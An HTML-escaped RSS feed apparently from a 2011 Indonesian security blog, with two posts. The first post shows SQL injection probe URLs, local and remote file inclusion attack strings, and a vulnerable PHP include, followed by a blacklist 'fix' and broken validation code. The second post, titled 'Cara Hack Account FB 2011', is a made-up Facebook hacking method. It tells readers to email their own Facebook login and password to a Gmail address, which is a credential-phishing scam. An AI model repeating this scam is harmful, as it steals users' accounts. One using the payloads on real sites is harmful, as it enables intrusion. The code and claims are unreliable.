Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in…..&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Setelah muncul pesan error,maka attacker melanjutkan aksinya&amp;nbsp;&lt;img alt=";)" class="wp-smiley" src="http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif?m=1303859951g" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-width: 100%; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" /&gt;&amp;nbsp;)&lt;br /&gt;
http://www.situs.net/index.php?id=1 ORDER BY 1– &amp;lt;– No error.&lt;br /&gt;
http://www.situs.net/index.php?id=1 ORDER BY 2– &amp;lt;– Muncul pesan error. Ini berarti hanya ada satu kolom&lt;br /&gt;
http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()– &amp;lt;– Memilih semua kolom dan menjalankan&lt;br /&gt;
perintah version().&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*Solusi :&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;$bug = “(delete)|(update)|(union)|(insert)|(drop)|(http)|(–)|(/*)|(select)”;&lt;br /&gt;
$patch = eregi_replace($bug, “”, $patch);&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;[4] File Inclusion&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;\_ Remote File Inclusion dan Local File Inclusion&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.&lt;br /&gt;
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server&lt;br /&gt;
dengan hanya melalui URL.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Contoh kode yang vulnerable :&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
include($_GET['page']);&lt;br /&gt;
?&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Beberapa contoh serangan :&lt;br /&gt;
http://www.sites.net/page.php?page=../../../../../etc/passwd&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt; contoh LFI&lt;br /&gt;
http://www.sites.net/page.php?page=http://www.site.com/evilscript.txt?&amp;nbsp; &amp;lt; contoh RFI&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*Solusi :&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Validate the input.&lt;br /&gt;
$page = $_GET['page'];&lt;br /&gt;
$allowed = array(‘index.php’, ‘games.php’ ‘ip.php’);&lt;br /&gt;
$iplogger = (‘ip.php’);&lt;br /&gt;
if (in_array $page, $pages)) {&lt;br /&gt;
include $page {&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
include $iplogger&lt;br /&gt;
die(“IP logged.”);&lt;br /&gt;
}&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3900780076543133178-2236140815105533209?l=sxcode.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=buAc4Nvb5zI:MisnKEDjDxQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:YwkR-u9nhCs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=YwkR-u9nhCs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=buAc4Nvb5zI:MisnKEDjDxQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=buAc4Nvb5zI:MisnKEDjDxQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:KwTdNBX3Jqk"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=buAc4Nvb5zI:MisnKEDjDxQ:KwTdNBX3Jqk" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:l6gmwiTKsz0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=l6gmwiTKsz0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=buAc4Nvb5zI:MisnKEDjDxQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=buAc4Nvb5zI:MisnKEDjDxQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityBlog/~4/buAc4Nvb5zI" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-27T00:54:02.599-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://sxcode.blogspot.com/2011/07/proteksi-website-dari-para-attacker.html</feedburner:origLink></item><item><title>Cara Hack Account FB 2011</title><link>http://feedproxy.google.com/~r/SecurityBlog/~3/kr77FM4SuXI/cara-hack-account-fb-2011.html</link><category>Tips - Triks</category><category>Facebook Hacking</category><author>noreply@blogger.com (Bajingan)</author><pubDate>Wed, 27 Jul 2011 00:30:39 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3900780076543133178.post-2714086188857439264</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Orang-orang ini tidak&amp;nbsp; menindaklanjuti tulisan terakhir .. dan saya merasa cukup senang coz saya mendapat sambutan baik&amp;nbsp; … Jadi Sebelum Anda menggunakan metode ini cara mudah hack akun facebook 2 jelaskan di sini, Anda harus berhati-hati!. Ini adalah tindakan ilegal! Ada banyak cara untuk hack account website seperti facebook. Xperience hacker biasanya menggunakan injeksi Kebanyakan XSS untuk perintah situs untuk menampilkan tabel user tha mana TEY Bisa mendapatkan password pengguna tha yang sudah dikonversi ke dalam kode hash.&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Ketika hacker mendapatkan password di kode hash, mereka akan mencoba untuk mengubahnya ke dalam teks normal menggunakan MD5 Decrypter atau alat Decrypter hash. Tapi bagaimana???? jika Anda hacker notta pengalaman, katakanlah Anda hanya ingin menjadi hacker tingkat. Sama seperti kita katakan di atas, ini adalah cara mudah untuk hack akun facebook, tapi yang lagi ini adalah tindakan ilegal!&amp;nbsp;&lt;img alt=":)" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif?m=1303930917g" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; max-width: 100%; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;strong style="font-weight: bold;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Bagaimana trik ini bekerja?&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Pertama, facebook website dengan API, berarti memiliki hubungan lubang banyak dari website lain (Semoga u bisa mengerti, seperti Mengakses kepada pihak ketiga appz) …&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Kedua, ada hubungan antara facebook dan Google mail server (Ha ha bertanya-tanya Bahkan saya lakukan) yang bisa kita gunakan untuk menyuntikkan tindakan serial dalam perintah tunggal untuk mesin facebook mana Google telah API juga (Seperti semua orang lain tahu).&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Dengan sederhana, untuk hack akun facebook kita akan menggunakan alamat email khusus di Google untuk pemulihan sandi facebook perintah, mengirimkan password ke alamat email tertentu (email Anda). Keberhasilan ini akan jika Anda;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Niggas lemme Listdown:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rH8vovMu5N0/Ti-9xLYZ5EI/AAAAAAAABBo/Lj4RZEhthHQ/s1600/hack1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;&lt;img border="0" height="297" src="http://3.bp.blogspot.com/-rH8vovMu5N0/Ti-9xLYZ5EI/AAAAAAAABBo/Lj4RZEhthHQ/s400/hack1.jpg" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;Bagaimana kedengarannya, semua orang berpikir keras untuk mendapatkannya .. NO R8?&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;Dan Satu hal lagi, Jangan khawatir tentang dua terakhir, i got itu juga .. akan menyediakan di sini.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;Saya yakin Anda siap untuk hack account teman Anda tidak? LMAO … OK&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;Daripada pergi mari, ikuti saja langkah satu per satu, tapi ingat, membaca seluruh halaman sebelum Anda melakukannya&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;MISI FORCE OPERASI:&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;1. Permintaan kata sandi pemulihan untuk facebook melalui mail server Google (Semoga ini Notta masalah besar bagi u semua)&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="color: white; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;a href="http://3.bp.blogspot.com/-o4ZpPjxDAdY/Ti-96dHEncI/AAAAAAAABBs/uG55vAfDTYk/s1600/hack2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-o4ZpPjxDAdY/Ti-96dHEncI/AAAAAAAABBs/uG55vAfDTYk/s1600/hack2.png" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Kami akan menggunakan mail server Google untuk mengirim kode API khusus untuk mesin pemulihan sandi facebook. Langkah ini adalah yang pertama dan tidak akan pernah sukses jika Anda tidak tahu alamat email. Untungnya, sekarang kita tahu alamat dan terima kasih tuhan alamat dalam penggunaan permanen, artinya tidak pernah berubah.&lt;br /&gt;
Gunakan aplikasi email [Wateva tha penyedia layanan, NO DEAL BESAR] (Google, Yahoo, AOL, Outlook, dll) untuk mengirim email ke defendhackers@gmail.com, dengan subject mengarahkan semua tindakan harus dalam huruf kecil (WATCH UR ASS) cara lain akan mengabaikan oleh pembunuh spam di mail server.&lt;br /&gt;
Pada tipe isi email baris pertama persis seperti di bawah ini:&lt;/div&gt;&lt;blockquote style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-origin: initial; background-position: 0% 0%; background-repeat: no-repeat no-repeat; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 10px; margin-right: 30px; margin-top: 15px; min-height: 32px; padding-bottom: 0px; padding-left: 60px; padding-right: 0px; padding-top: 0px; quotes: ''; vertical-align: baseline;"&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;command code:3769145744b24227b72f231eea906dd0&lt;br /&gt;
priority:8d966b2253a917086c8604959e152243&lt;br /&gt;
target:26cae7718c32180a7a0f8e19d6d40a59&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Kode diatas adalah perintah untuk mail server Google untuk mengirimkan kode API untuk facebook. Selanjutnya kita akan perlu memberikan facebook beberapa variabel mesin perlu melakukan tindakan pemulihan password.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;2. Memasuki Target:Ketika facebook mendapatkan perintah pemulihan password dari server lain sebagai API, facebook akan dari kebutuhan untuk menjelaskan bahwa pengguna permintaan ada. Untuk melakukan hal ini menambahkan target Anda facebook nama pengguna (nama tampilan teman facebook Anda) di baris seperti di bawah ini:saya: e268443e43d93dab7ebef303bbe9642f + target Anda nama pengguna&lt;br /&gt;
Jenis: user&lt;br /&gt;
&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Anda harus mengubah nama target pengguna Anda untuk nama pengguna tertentu yang Anda ingin mengetahui password. Pastikan tidak ada ruang antara e268443e43d93dab7ebef303bbe9642f tanda plus dan nama target pengguna Anda&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;SO upto MASIH, CLEAR .. kurasa ..!!!&lt;br /&gt;
3. Menerima password pada account email tertentu:Ketika facebook menemukan bahwa nama pengguna ada, facebook akan mengirimkan password ke alamat email yang mendaftar kepada pemilik nama pengguna. Kecuali Anda memberikan alamat email alternatif. Hampir semua website dengan alamat email anggota telah alternatif dalam tabel user mereka termasuk facebook. Tapi tidak semua situs menampilkan form untuk memasukkan alamat email alternatif bagi pengguna mereka.&lt;br /&gt;
Kabar baiknya adalah, facebook selalu menggunakan alamat email alternatif sebagai prioritas utama dalam mengirimkan email ketika mesin mendapatkan pemulihan password melalui API. Untuk menerima password di alamat email Anda, Anda harus memberikan password Anda pada baris perintah (dalam email) sebagai alamat email alternatif, tetapi facebook akan memeriksa alamat email, email ini tabel user dalam database mereka atau tidak. Berarti Anda harus mengetik alamat email Anda yang Anda gunakan untuk mendaftar ke facebook sebagai ditunjukkan di bawah ini:saya []: 082856831ec22b63f594f61efb8d5d5e + alamat email Anda&lt;br /&gt;
Indeks: push&lt;br /&gt;
